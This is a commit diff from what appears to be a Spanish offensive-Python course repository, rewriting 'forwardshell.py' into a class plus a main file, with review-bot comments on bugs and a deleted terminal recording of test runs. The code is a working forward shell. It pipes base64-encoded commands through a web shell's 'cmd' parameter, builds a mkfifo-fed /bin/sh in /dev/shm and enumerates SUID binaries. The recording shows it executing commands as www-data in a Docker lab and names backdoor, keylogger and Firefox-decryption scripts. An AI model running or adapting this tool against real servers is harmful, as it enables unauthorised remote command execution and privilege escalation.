

2 Commits

Author SHA1 Message Date
d7252c6782 Update forwardshell script 2024-02-03 12:28:27 +01:00
d4c5d8a50f wip 2024-02-03 12:27:47 +01:00
3 changed files with 154 additions and 190 deletions


@ -11,41 +11,145 @@ mkfifo input; tail -f input | /bin/sh 2>&1 > output
"""
import requests
import signal
import sys
import time
from termcolor import colored
from base64 import b64encode
def def_handler(sig, frame):
print(colored("\n[!] Exiting...", "blue"))
sys.exit(1)
from random import randrange
signal.signal(signal.SIGINT, def_handler)
class ForwardShell:
main_url = "http://localhost/index.php"
def __init__(self):
session = randrange(100000, 999999)
self.main_url = "http://localhost/index.php"
self.stdin = f"/dev/shm/{session}.input"
self.stdout = f"/dev/shm/{session}.output"
self.help_options = {
'enum suid': 'FileSystem SUID Privileges Enumeration',
'help': 'Show this help panel',
}
self.is_pseudo_terminal = False
def run_command(self, command):
command = b64encode(command.encode()).decode()
data = {
'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
}
try:
r = requests.get(self.main_url, params=data, timeout=5)
return r.text
except:
pass
return None
def write_stdin(self, command):
command = b64encode(command.encode()).decode()
data = {
'cmd': 'echo "%s" | base64 -d > %s' % (command, self.stdin)
}
r = requests.get(self.main_url, params=data)
def read_stdout(self):
for _ in range(5):
read_stdout_command = f"/bin/cat {self.stdout}"
output_command = self.run_command(read_stdout_command)
time.sleep(0.2)
return output_command
def setup_shell(self):
command = f"mkfifo {self.stdin}; tail -f {self.stdin} | /bin/sh 2>&1 > {self.stdout}"
self.run_command(command)
def remove_data(self):
remove_data_command = f"/bin/rm {self.stdin} {self.stdout}"
self.run_command(remove_data_command)
def clear_stdout(self):
clear_stdout_command = f"echo '' > {self.stdout}"
self.run_command(clear_stdout_command)
def run(self) -> None:
self.setup_shell()
while True:
command = input(colored("> ", "yellow"))
if "script /dev/null -c bash" in command:
print(
colored("[+] Se ha iniciado una pseudo-terminal", "blue"))
self.is_pseudo_terminal = True
def run_command(command):
if command.strip() == "enum suid":
command = b64encode(command.encode()).decode()
command = f"find / -perm -4000 2>/dev/null | xargs ls -l"
data = {
'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
}
if command.strip() == "help":
r = requests.get(main_url, params=data)
print(colored(f"\n[+] Listando panel de ayuda:\n", "blue"))
return r.text
for key, value in self.help_options.items():
print(f"\t{key} - {value}")
continue
self.write_stdin(command + "\n")
output_command = self.read_stdout()
if command.strip() == "exit":
self.is_pseudo_terminal = False
print(colored("[+] Se ha cerrado la pseudo-terminal", "blue"))
self.clear_stdout()
continue
if __name__ == '__main__':
if self.is_pseudo_terminal:
lines = output_command.split("\n")
while True:
if len(lines) == 1:
command = input(colored("> ", "yellow"))
output_command = run_command(command)
cleared_output = '\n'.join([lines[-1]] + lines[:1])
print(output_command)
elif len(lines) > 1:
cleared_output = '\n'.join(
[lines[-1]] + lines[:1] + lines[2:-1])
else:
print(len(lines))
print(lines)
print(cleared_output + "\n")
else:
print(output_command)
self.clear_stdout()
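Review bot: The bare `except: pass` in `run_command` (the block around `r = requests.get(self.main_url, params=data, timeout=5)`) also catches `SystemExit` and `KeyboardInterrupt`, so a Ctrl-C that arrives while a request is in flight is swallowed and the SIGINT handler's `sys.exit(1)` never ends the process; narrow it to `except requests.RequestException:`. That same branch returns `None`, which `read_stdout` hands back unchanged, and `run` then calls `output_command.split("\n")` on it in the pseudo-terminal path without a `None` check. `write_stdin` issues its `requests.get` without the `timeout=5` that `run_command` uses, so a stalled server leaves the prompt hanging indefinitely. Whether `run` ends at the final `self.clear_stdout()` is not visible from the hunk.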


@ -0,0 +1,29 @@
#!/usr/bin/env python3
"""
Fichero principal de la aplicación.
"""
import signal
import sys
from forwardshell import ForwardShell
from termcolor import colored
def def_handler(sig, frame) -> None:
print(colored("\n[!] Exiting...", "blue"))
my_forward_shell.remove_data()
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
if __name__ == '__main__':
my_forward_shell = ForwardShell()
my_forward_shell.run()
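Review bot: `def_handler` dereferences `my_forward_shell`, but the handler is installed by `signal.signal(signal.SIGINT, def_handler)` at import time while that name is only bound inside the `if __name__ == '__main__':` block, so a SIGINT delivered before `ForwardShell()` returns, or in any process that imports this module, raises `NameError` inside the handler instead of cleaning up. Moving the `signal.signal(signal.SIGINT, def_handler)` line into the guard, directly after `my_forward_shell = ForwardShell()`, closes both gaps and keeps the module free of import-time side effects. Note also that `remove_data()` performs an HTTP request from within the signal handler; if that request stalls, the `sys.exit(1)` that follows is never reached.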


@ -1,169 +0,0 @@
Script started on 2024-02-02 18:20:04+01:00 [TERM="xterm-256color" TTY="/dev/pts/1" COLUMNS="106" LINES="53"]
 
7🐧 ~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs at ⚡ 18:20:04
 [?2004h[?25l8]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs]1;..hacking/12_fs]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs\%  
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES at ⚡ 18:20:04
 [?1h=[?25h[?2004h[?25l 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115[?25h[?25l 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115 📡 192.145.39.55[?25hscriptscript/[?1l>[?25l[?2004l  script/[?25h
]2;script/]1;script/% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:09
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004h##!#!//uussrr//bbiinn//eennvv  ppyytthhoonn3[?1l>[?25l[?2004l  #!/usr/bin/env python3[?25h
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:30
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hccurl -s -X GET 'http://localhost/' -G --data-urlencode 'cmd=cat /etc/resolv.conf 2>&1'co🏠 192.168.1.115 📡 192.145.39.55de index.htmlcoddd           d e index.htmlcode f         irmaMail-Prefapp.htmlo                    rwat rdshell.py[?1l>[?25l[?2004l  code forwardshell.py[?25h
]2;code forwardshell.py]1;code% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:44
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hppyinstaller --noconsole --onefile backdoor.pypy                                           listener.pyf          irefox_decrypt.pyfo                orrwardshell.py  [?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;pywww-data
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:23:42
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> cat
/
^CTraceback (most recent call last):
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 23, in <module>
output_command = run_command(command)
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 14, in run_command
r = requests.get(main_url, params=data)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 73, in get
return request("get", url, params=params, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/adapters.py", line 489, in send
resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 700, in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 446, in _make_request
six.raise_from(e, None)
File "<string>", line 3, in raise_from
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
httplib_response = conn.getresponse()
File "/usr/lib/python3.10/http/client.py", line 1375, in getresponse
response.begin()
File "/usr/lib/python3.10/http/client.py", line 318, in begin
version, status, reason = self._read_status()
File "/usr/lib/python3.10/http/client.py", line 279, in _read_status
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
File "/usr/lib/python3.10/socket.py", line 705, in readinto
return self._sock.recv_into(b)
KeyboardInterrupt
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15/12/script on ☕ main ?1
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> whoami
www-data
> cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.2 2f2f81768a05
> pwd
/var/www/html
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.55[?1h=[?2004h[?25l 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.54[?25hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 6s 🔒 ES vpn at ⚡ 18:35:25
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:02
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> ls
index.php
> e ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:36
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hppy forwardshell.pyph                php --interactive[?1l>[?25l[?2004l  php --interactive[?25h
]2;php --interactive]1;phpzsh: command not found: php
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:36:56
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hdd exec -it 2f2 bashdo                 cker portdocckkedocker e   xec -it 0fc1 shxec -it 0fc1 sh[?1l>[?25l[?2004l  docker exec -it 0fc1 sh[?25h
]2;docker exec -it 0fc1 sh]1;dockerError response from daemon: No such container: 0fc1
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:37:09
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hddocker exec -it 0fc1 shd                      exec -it 2f2 bashexec -it 2f2 bash[?1l>[?25l[?2004l  d exec -it 2f2 bash[?25h
]2;docker exec -it 2f2 bash]1;droot@2f2f81768a05:/var/www/html# php --version
PHP 7.0.33 (cli) (built: Dec 29 2018 06:50:58) ( NTS )
Copyright (c) 1997-2017 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies
root@2f2f81768a05:/var/www/html# php --interactive
Interactive shell
php > exit
root@2f2f81768a05:/var/www/html# e exit
exit
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 1m 55s 🔒 ES vpn at ⚡ 18:39:09
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hmmkdir scriptmkmkddimkdir c     atch-all/01_scripts_descifrador_wargame.pyi                                         bnc    atch-all/01_scripts_descifrador_wargame.pyo                                         mandos-peladon            cepto[?1l>[?25l[?2004l  mkdir concepto[?25h
]2;mkdir concepto]1;mkdir% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:33
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hllsls[?1l>[?25l[?2004l  ls[?25h
]2;ls --color=tty]1;lsconcepto forwardshell.py
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:33
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hccode forwardshell.pycocon                 catenadas="hola $kease"ncce                     epconcepto/o [?1l>[?25l[?2004l  concepto[?25h
]2;concepto]1;concepto% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:36
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hmmkdir conceptomkmkf           ifo --helpfiifmkfifo i     npyt;    ut;t  ttaaitail -f inop  put | //bbi/binn//bin/s/bin/sh 22>>&1 Z > ouputtput[?1l>[?25l[?2004l  mkfifo input; tail -f input | /bin/sh 2>&1 > output[?25h
]2;mkfifo input; tail -f input | /bin/sh 2>&1 > output]1;mkfifo^C
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1 х INT took 7m 34s 🔒 ES vpn at ⚡ 18:48:03
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hcconceptoca      t ../09_keylogger/.env | pbcopycat o                            utput.pcap | wc -louutput              [?1l>[?25l[?2004l  cat output[?25h
]2;cat output]1;catv
/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto
/home/v
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1  🔒 ES vpn at ⚡ 18:48:11
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hcat outputls       cat outputecho "whoami" > inputcat output         ls       cat outputecho "pwd" > inputcat output       ls       cat outputecho "whoami" > inputcat output         ls       cat outputls       cat output         mmkfifo input; tail -f input | /bin/sh 2>&1 > outputmkmkd                                                ir conceptomk            fifo input; tail -f input | /bin/sh 2>&1 > outputmkfmkfifo input; tail -f input | /bin/sh 2>&1 > output[?1l>[?25l[?2004l  mkfifo input; tail -f input | /bin/sh 2>&1 > output[?25h
]2;mkfifo input; tail -f input | /bin/sh 2>&1 > output]1;mkfifomkfifo: no sha pogut crear la cua FIFO 'input': El fitxer ja existeix
/bin/sh: 5: probando: not found
^C
Session terminated, killing shell...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1 х INT took 4m 51s 🔒 ES vpn at ⚡ 18:53:13
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004h ...killed.
[?25l  [?25h[?2004l
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ❌ ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto х INT 🔒 ES vpn at ⚡ 22:59:38
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004h 
🐧 ❌ ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto х INT 🔒 ES vpn at ⚡ 22:59:38
 🏠 192.168.1.112 📡 192.145.39.54eecho "whoami" > inputex                   itexiexit[?1l>[?25l[?2004l  exit[?25h
]2;exit]1;exit
Script done on 2024-02-02 23:00:00+01:00 [COMMAND_EXIT_CODE="130"]